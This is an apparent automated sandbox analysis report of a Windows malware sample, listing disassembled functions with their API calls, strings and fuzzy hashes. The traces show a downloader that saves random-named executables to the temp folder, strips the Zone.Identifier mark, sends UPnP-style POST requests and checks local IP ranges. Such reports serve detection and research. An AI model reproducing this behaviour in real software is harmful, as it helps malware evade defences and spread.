Opcode Fuzzy Hash: 758c8ddec5ebc3f2fbc60252ee954f274e779d6146799bd0d90b894ddaeb8b1a
Instruction Fuzzy Hash: 2C124FF5D00109ABCF14DF98D985AEFB7B5BB98304F10816DE609B7380D739AA41CBA5

Function 00409EE0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeaps.KERNEL32(000000FF,?), ref: 00409EFC

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: HeapsProcess
String ID:
API String ID: 1420622215-0
Opcode ID: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
Instruction ID: 8d4b3b75e0ca4951d81b7fee5ffefe8b4dae6978097e516d12ce04c36a2bdc79
Opcode Fuzzy Hash: 1373c558315c2bb7b1b39264dd611deb399c5604e49ba0dd3c9b15e56f9cb6f7
Instruction Fuzzy Hash: 6B01ECB4904219CADB248F14D9847A9B778AB44304F1081E6D709B7282C2B85ECACF5E

Function 0040A500 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a4742e2e7356186e64ac596d0aac80efded56b294b4881e2932ca283d7c95dd
Instruction ID: ad55d0a0fc81490cd0e7a8c39e77b8496904da2014b800c37f86947748ff7242
Opcode Fuzzy Hash: 7a4742e2e7356186e64ac596d0aac80efded56b294b4881e2932ca283d7c95dd
Instruction Fuzzy Hash: DA128CB4D002199FCB08CF99D991AEEFBB2BF88304F24856AE415BB345D334AA15CF54

Function 0040EE74 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
Instruction ID: 054a0bb403a3dad9bf0ef84f7a0700921875b898f10d87bbce24b5acd7998093
Opcode Fuzzy Hash: 055ce3a16072e11c5b5b43c4deef216cb34a050bfe9534eea9d89275913ec06d
Instruction Fuzzy Hash: 4721B872900205AFC710EF79C880967FBA5FF45310B45857EE9559B286E734F925C7E0

Function 0040EAE0 Relevance: 73.7, APIs: 34, Strings: 8, Instructions: 227
filenetworksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040EAE9
srand.MSVCRT ref: 0040EAF0
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EB10
strlen.NTDLL ref: 0040EB1A
mbstowcs.NTDLL ref: 0040EB31
rand.MSVCRT ref: 0040EB39
rand.MSVCRT ref: 0040EB4D
wsprintfW.USER32 ref: 0040EB74
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EB8A
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EBB9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EBE8
InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EC1B
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EC4C
CloseHandle.KERNEL32(000000FF), ref: 0040EC5B
wsprintfW.USER32 ref: 0040EC74
DeleteFileW.KERNEL32(?), ref: 0040EC84
Sleep.KERNEL32(000007D0), ref: 0040ECA5
ExitProcess.KERNEL32 ref: 0040ECCD
DeleteFileW.KERNEL32(?), ref: 0040ECE3
CloseHandle.KERNEL32(000000FF), ref: 0040ECF0
InternetCloseHandle.WININET(00000000), ref: 0040ECFD
InternetCloseHandle.WININET(00000000), ref: 0040ED0A
Sleep.KERNEL32(000003E8), ref: 0040ED15
rand.MSVCRT ref: 0040ED2A
Sleep.KERNEL32 ref: 0040ED3B
rand.MSVCRT ref: 0040ED41
rand.MSVCRT ref: 0040ED55
wsprintfW.USER32 ref: 0040ED7C
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040ED99
wsprintfW.USER32 ref: 0040EDB9
DeleteFileW.KERNEL32(?), ref: 0040EDC9
Sleep.KERNEL32(000007D0), ref: 0040EDEA
ExitProcess.KERNEL32 ref: 0040EE11
DeleteFileW.KERNEL32(?), ref: 0040EE20

Strings

%temp%, xrefs: 0040EB0B
%s\%d%d.exe, xrefs: 0040EB68
%s:Zone.Identifier, xrefs: 0040EDAD
%s\%d%d.exe, xrefs: 0040ED70
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EB85
]u@, xrefs: 0040EE06, 0040ECC2
%s:Zone.Identifier, xrefs: 0040EC68
.ou, xrefs: 0040EC5B, 0040ECF0

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: File$Internetrand$CloseDeleteHandleSleepwsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$]u@$.ou
API String ID: 3709769524-481826255
Opcode ID: cde54363ed6e66bf7c32733fe20a8141ebc92d2c64877f6f05ce73e4651f385c
Instruction ID: cec73e08c6f056f0168379cb50c3066ff26982e4471096ca0769119a3115f73e
Opcode Fuzzy Hash: cde54363ed6e66bf7c32733fe20a8141ebc92d2c64877f6f05ce73e4651f385c
Instruction Fuzzy Hash: 5E81E9B5900318ABE720DB61DC49FEA3379AB88701F0484FDF609A51C1DAB99BD4CF59

Function 0040AEA0 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040ADD0: gethostname.WS2_32(?,00000100), ref: 0040ADEC
Part of subcall function 0040ADD0: gethostbyname.WS2_32(?), ref: 0040ADFE

strcmp.NTDLL ref: 0040AED0

Strings

.10., xrefs: 0040AFDB
127., xrefs: 0040AEE1
.127., xrefs: 0040AF1D
.127, xrefs: 0040AEFF
10., xrefs: 0040AF9F
192., xrefs: 0040AF40
.10, xrefs: 0040AFBD
0.0.0.0, xrefs: 0040AEBE
.192., xrefs: 0040AF7C
.192, xrefs: 0040AF5E

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: gethostbynamegethostnamestrcmp
String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
API String ID: 2906596889-2213908610
Opcode ID: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
Instruction ID: 458019ee7e4258451e0266341ac37eb9dcc64f8272ac2f4812142232ba39784f
Opcode Fuzzy Hash: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
Instruction Fuzzy Hash: 406162B4A00305BBDF00EF65EC56BAA37659B10348F14847EE8496A3C1E73DE964C79E

Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138
networksynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040192C
WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
accept.WS2_32(?,?,?), ref: 004019A8
GetTickCount.KERNEL32 ref: 004019F6
EnterCriticalSection.KERNEL32(?), ref: 00401A09
LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
GetTickCount.KERNEL32 ref: 00401A43
EnterCriticalSection.KERNEL32(?), ref: 00401A52
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
GetTickCount.KERNEL32 ref: 00401AAB
WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB

Strings

ilci, xrefs: 004019E1
PCOI, xrefs: 0040198A

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
String ID: PCOI$ilci
API String ID: 3345448188-3762367603
Opcode ID: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
Instruction ID: eeda51e0e3d97f01d1798d9b0ac8f7385833fedac5999c9123737cb6f89c21c8
Opcode Fuzzy Hash: 33a2561f4f33f1c23cf89dbb798d82106e513be12dc6673eed8a381d7532f20f
Instruction Fuzzy Hash: 25412771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF955A72E1DB78E885CB99

Function 0040E4F0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0040E518
InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040E568
InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040E57B
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E5B4
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E5EA
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040E615
HttpSendRequestA.WININET(00000000,00411AB8,000000FF,00009E34), ref: 0040E63F
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E67E
memcpy.NTDLL(00000000,?,00000000), ref: 0040E6D0
InternetCloseHandle.WININET(00000000), ref: 0040E701
InternetCloseHandle.WININET(00000000), ref: 0040E70E
InternetCloseHandle.WININET(00000000), ref: 0040E71B

Strings

<, xrefs: 0040E520
Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x), xrefs: 0040E576
POST, xrefs: 0040E5DE

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
API String ID: 2761394606-2217117414
Opcode ID: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
Instruction ID: e955f883797a19afba403fb4bb1b0f9258be9a3219da5a2a8556d37a4b3763d0
Opcode Fuzzy Hash: c7654f31e89d91c1c7a0e640e7adfa6a7e0684f185013bf68e28b6683bc3e05a
Instruction Fuzzy Hash: 73515C71A01228ABDB26CF54CC44BDD77BCAB48705F1085E9F60DA6280CBB9ABC4CF54

Function 00401600 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 96
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(?,00000000,?,?,004021A5,00000000), ref: 0040161F
InterlockedDecrement.KERNEL32(?), ref: 0040164B
InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401663
InterlockedIncrement.KERNEL32(?), ref: 00401691
InterlockedDecrement.KERNEL32(?), ref: 004016A1
LeaveCriticalSection.KERNEL32(?,?,?,004021A5,00000000), ref: 004016B9
SetEvent.KERNEL32(?,?,?,004021A5,00000000), ref: 004016C3
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,?,004021A5,00000000), ref: 004016E0
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 00401709
CloseHandle.KERNEL32(?,?,?,004021A5,00000000), ref: 0040170F
WSACloseEvent.WS2_32(?), ref: 00401715
DeleteCriticalSection.KERNEL32(?,?,?,?,004021A5,00000000), ref: 0040172B

Strings

ilci, xrefs: 00401630
PCOI, xrefs: 0040160D
.ou, xrefs: 004016FF

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Interlocked$CloseCriticalSection$DecrementEventHandle$CompletionDeleteEnterExchangeIncrementLeavePostQueuedStatus
String ID: PCOI$ilci$.ou
API String ID: 2403999931-3537421359
Opcode ID: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
Instruction ID: 0b50c8f8eba6d918d1ff78dc69fee2fe4193f5a447302b2e0c9d98a55ef35816
Opcode Fuzzy Hash: c44d603fe9a75a3e452b6e95f97135d336e9b1c5a023eff3a58c0289fb86f454
Instruction Fuzzy Hash: 6731A671900705ABC710AF70EC48B97B7B8BF09300F048A3EE559A7690D779F894CB98

Function 00405880 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73
windowsleepregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 00405898
GetModuleHandleW.KERNEL32(00000000), ref: 004058B0
Sleep.KERNEL32(00000001), ref: 004058C4
GetTickCount.KERNEL32 ref: 004058CA
GetTickCount.KERNEL32 ref: 004058D3
wsprintfW.USER32 ref: 004058E6
RegisterClassExW.USER32(00000030), ref: 004058F3
CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040591C
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405937
TranslateMessage.USER32(?), ref: 00405945
DispatchMessageA.USER32(?), ref: 0040594F
ExitThread.KERNEL32 ref: 00405961

Strings

0, xrefs: 004058A0
%x%X, xrefs: 004058DA

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
String ID: %x%X$0
API String ID: 716646876-225668902
Opcode ID: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
Instruction ID: 85e967beda8c0998690da8d5d0b59a8f0be79fc45de23a81cc248e6733ffc6a2
Opcode Fuzzy Hash: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
Instruction Fuzzy Hash: DB211DB1940308BBEB10ABA0DC49FEE7B78EB04711F10812AF601BA1D0DBB99545CF68

Function 0040DBC0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 130
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0040DBE8
InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
memcpy.NTDLL(00000000,?,00000000), ref: 0040DD7A
InternetCloseHandle.WININET(00000000), ref: 0040DDB7
InternetCloseHandle.WININET(00000000), ref: 0040DDC4
InternetCloseHandle.WININET(00000000), ref: 0040DDD1

Strings

<, xrefs: 0040DBF0
GET, xrefs: 0040DCAB

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectCrackFileReadSendmemcpymemset
String ID: <$GET
API String ID: 1205665004-427699995
Opcode ID: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
Instruction ID: 2be109b622ab9a99a7f53353d246b615867c30bbfdc4ae23a93fa512118ea852
Opcode Fuzzy Hash: 3d63e0aafab1991fc3654c1209df296bc7dd287a5f283a095d403ee724d31a9f
Instruction Fuzzy Hash: CA511CB5D01228ABDB36CB50CC55BE9B7BCAB44705F0480E9E60DAA2C0D7B96BC4CF54

Function 0040E7C0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 144fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F2
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040E813
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040E832
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E84B
memcmp.NTDLL ref: 0040E8DD
UnmapViewOfFile.KERNEL32(00000000), ref: 0040E900
CloseHandle.KERNEL32(00000000), ref: 0040E90A
CloseHandle.KERNEL32(000000FF), ref: 0040E914
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040E933
WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040E958
CloseHandle.KERNEL32(000000FF), ref: 0040E962

Strings

.ou, xrefs: 0040E90A, 0040E914, 0040E962

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
String ID: .ou
API String ID: 3902698870-3683031111
Opcode ID: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
Instruction ID: 0da617c1af0bd4dbc976a582f880bbe3058530cb6ade4bb6176e088db5cb8200
Opcode Fuzzy Hash: b869aee79376eb15e29cfc35776bfc365ceedf1ca9f967d9851591379fd0193a
Instruction Fuzzy Hash: D3516DB5E00308FBDB14DBA4CC49BEEB774AB48304F108569F611BB2C1D7B9AA40CB58

Function 0040B2C0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00416690,?,?,?,?,?,?,00407A56), ref: 0040B2CB
CreateFileW.KERNEL32(00416478,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B31D
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B33E
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B35D
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B372
UnmapViewOfFile.KERNEL32(00000000), ref: 0040B3D8
CloseHandle.KERNEL32(00000000), ref: 0040B3E2
CloseHandle.KERNEL32(000000FF), ref: 0040B3EC

Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5,?,0040B3B5,00000000), ref: 0040D4AA
Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8

Strings

Vz@, xrefs: 0040B33A, 0040B3E8, 0040B36E
.ou, xrefs: 0040B3E2, 0040B3EC

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
String ID: Vz@$.ou
API String ID: 439099756-1244017076
Opcode ID: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
Instruction ID: 3b431581fb8605495e02e5545908ab4f756817927d1539066ca4ce1953719e7c
Opcode Fuzzy Hash: ee7dbac5f2ba26ac0a343239ed6675f37eb8ab6d8ccb57ef49a08724b9c129be
Instruction Fuzzy Hash: 91411C74E40309EBDB10DFA4DC4ABAEB774EB44704F208569EA11BA2C1C7B96541CB9D

Function 0040D2D0 Relevance: 16.6, APIs: 11, Instructions: 95threadsleepsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0040D2D6
GetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2DD
GetCurrentThread.KERNEL32 ref: 0040D2E8
SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,?,000000FF), ref: 0040D2EF
InterlockedExchangeAdd.KERNEL32(00407AD2,00000000), ref: 0040D312
EnterCriticalSection.KERNEL32(000000FB), ref: 0040D347
WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D392
LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D3AE
Sleep.KERNEL32(00000001), ref: 0040D3DE
GetCurrentThread.KERNEL32 ref: 0040D3ED
SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2), ref: 0040D3F4

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
String ID:
API String ID: 3862671961-0
Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
Instruction ID: a8d0ef9cc0f8c3f9fe641a145e15df681aa384361be6a62e8494921e8eef4e23
Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
Instruction Fuzzy Hash: 0A411A74D00209EFDB04DFE4D888BAEBB71EB44315F14816AE916A7380D7789A85CF5A

Function 00405BC0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97fileCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00415E30,?,?,?,?,?,00407A20), ref: 00405BCB
CreateFileW.KERNEL32(00416060,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407A20), ref: 00405BE5
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C06
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C25
GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C3E
UnmapViewOfFile.KERNEL32(00000000), ref: 00405CCB
CloseHandle.KERNEL32(00000000), ref: 00405CD5
CloseHandle.KERNEL32(000000FF), ref: 00405CDF

Strings

.ou, xrefs: 00405CD5, 00405CDF

Memory Dump Source

Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_896429707.jbxd

Similarity

API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
String ID: .ou
API String ID: 3956458805-3683031111
Opcode ID: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
Instruction ID: 44e1aa5071e985e1939c8a19f3b292d5e35966d71e561f6040ad28af9ac572d1
Opcode Fuzzy Hash: b6454fe67246050de154b4b2d7b685814819646854cbf1c4f394f4a459172caa
Instruction Fuzzy Hash: 4B31FD74E44309EBEB14DBA4CD49BAFBB74EB48700F208569E601772C0D7B96941CF99

Function 00406060 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00415E30,00000000,0040B8F2,006A0266,?,0040B90E,00000000,0040D0A4,?), ref: 0040606F
memcpy.NTDLL(?,00000000,00000100), ref: 00406101
CreateFileW.KERNEL32(00416060,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406225
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00406287
FlushFileBuffers.KERNEL32(000000FF), ref: 00406293
CloseHandle.KERNEL32(000000FF), ref: 0040629D
